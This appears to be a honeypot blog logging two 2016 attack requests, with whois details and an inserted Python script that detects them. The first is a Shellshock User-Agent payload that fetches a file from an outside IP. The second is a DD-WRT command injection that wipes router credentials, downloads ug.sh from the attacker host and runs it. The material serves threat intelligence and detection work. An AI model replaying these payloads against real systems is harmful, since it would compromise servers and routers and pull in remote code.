Thursday, 11 February 2016

159.226.162.196 - #perl wget via 204.232.209.188

BEGIN OF HTTP DATA:
2016-02-11 19:15:33
Source IP: 159.226.162.196
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 109.234.106.8
Connection: Close


END OF DATA

The HTTP server returned 404 at the time of the investigation.


Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.

Disclaimer: This information is provided as-is and there is no guarantee
that blocking an IP or domain reported in this overview will not adversely
impact your business. Use all information provided at your own risk;
the author disclaims all warranty and shall not be liable for any damage
or impact caused.

159.226.162[.]196

    Whois Data (TeamCymru)
  • AS : 7497
  • IP : 159.226.162.196
  • BGP Prefix : 159.226.162.0/24
  • CC : CN
  • Registry : apnic
  • Allocated :
  • AS Name: CSTNET-AS-AP Computer Network Information Center,CN
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

204.232.209[.]188

    Whois Data (TeamCymru)
  • AS : 33070
  • IP : 204.232.209.188
  • BGP Prefix : 204.232.192.0/19
  • CC : US
  • Registry : arin
  • Allocated : 2009-06-24
  • AS Name: RMH-14 - Rackspace Hosting,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 213.136.72.84 . shellshock perl via 204.232.209.188
  • Reference: http://sendmespamids.blogspot.com/2016/01/2131367284-shellshock-perl-via.html
  • In db since: 2016-01-22 08:36:12.295000

Sunday, 7 February 2016

178.57.115.231 - (Russian IPs) possible DD-WRT firmware via 178.57.115.231:8081

BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 178.57.115.231
GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0
Host:195.169.125.87:8080

END OF DATA

The ug.sh script tries to download a binary file.

Just by looking at the xxd and strings output of that file, it looks like a DD-WRT firmware file.
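As an added defender-side example (not part of the original post, and not the honeypot's own code), the following Python script classifies raw HTTP request captures like the two above. It flags the Shellshock function-definition prefix `() { :;};` in any header value, flags shell metacharacters and `$IFS` word-splitting in the request target (the DD-WRT payload uses `$IFS` in place of spaces), and pulls the download URLs out as indicators after undoing the `$IFS` and escaped-slash obfuscation. The sample requests are constructed inline from the captures on this page; the function names, regexes and the benign control request are this example's own assumptions.

```python
import re

# Sample requests, constructed here from the honeypot captures above so the
# example runs offline. The Shellshock one is shortened to two of the fetchers.
SHELLSHOCK_REQUEST = (
    "GET HTTP/1.1 HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";"
    "system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; "
    "curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png \");'\r\n"
    "Host: 109.234.106.8\r\n"
    "Connection: Close\r\n\r\n"
)

DDWRT_REQUEST = (
    "GET /cgi-bin/;nvram$IFS\\set$IFS\\http_passwd;nvram$IFS\\commit;cd$IFS\\/tmp;"
    "wget$IFS\\http:\\/\\/178.57.115.231:8081\\/h\\/wrt\\/ug.sh;/bin/sh$IFS\\/tmp/ug.sh HTTP/1.0\r\n"
    "Host:195.169.125.87:8080\r\n\r\n"
)

# Constructed benign request used as a control.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n"
    "Host: example.test\r\n\r\n"
)

# Shellshock: a function definition "() { :;};" followed by a trailing command,
# which vulnerable Bash versions executed when importing environment variables.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:\s*;\s*\}\s*;")

# Command injection in the request target: a shell separator followed by a
# command word, or $IFS used as a space substitute (no literal spaces needed).
CMD_INJECTION_RE = re.compile(
    r"[;|`]\s*\\?(?:nvram|wget|curl|sh|/bin/sh|cd|chmod)\b|\$IFS"
)

URL_RE = re.compile(r'''https?://[^\s"';]+''')


def normalize_shell_text(text):
    """Undo the two obfuscations seen in the captures: $IFS standing in for a
    space and backslash-escaped slashes (http:\\/\\/) in the wget argument."""
    return text.replace("$IFS", " ").replace("\\/", "/")


def parse_request(raw):
    """Split a raw HTTP request into method, target and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {
        "method": parts[0],
        "target": parts[1] if len(parts) > 1 else "",
        "headers": headers,
    }


def classify_request(raw):
    """Return detection verdicts and extracted indicators for one raw request."""
    req = parse_request(raw)
    headers = req["headers"]
    # Shellshock can ride in any header that a CGI handler exports into the
    # environment, so every header value is checked, not only User-Agent.
    shellshock_headers = [n for n, v in headers.items() if SHELLSHOCK_RE.search(v)]
    cmd_injection = bool(CMD_INJECTION_RE.search(req["target"]))
    urls = []
    for url in URL_RE.findall(normalize_shell_text(raw)):
        if url not in urls:  # keep order, drop repeats from the fetcher chain
            urls.append(url)
    return {
        "host": headers.get("host", ""),
        "shellshock_headers": shellshock_headers,
        "cmd_injection": cmd_injection,
        "urls": urls,
        "suspicious": bool(shellshock_headers) or cmd_injection,
    }


if __name__ == "__main__":
    for label, raw in (("shellshock", SHELLSHOCK_REQUEST),
                       ("dd-wrt", DDWRT_REQUEST),
                       ("benign", BENIGN_REQUEST)):
        print(label, classify_request(raw))
```

Feeding the honeypot's raw captures through `classify_request` gives one record per request with the target host, the offending header names, and the stage-two URLs, which is the part worth forwarding to a blocklist or a feed database like the one cited below.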



178.57.115[.]231

    Whois Data (TeamCymru)
  • AS : 60139
  • IP : 178.57.115.231
  • BGP Prefix : 178.57.112.0/21
  • CC : RU
  • Registry : ripencc
  • Allocated : 2010-02-02
  • AS Name: Z-TELECOM Z-Telecom Ltd,RU
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
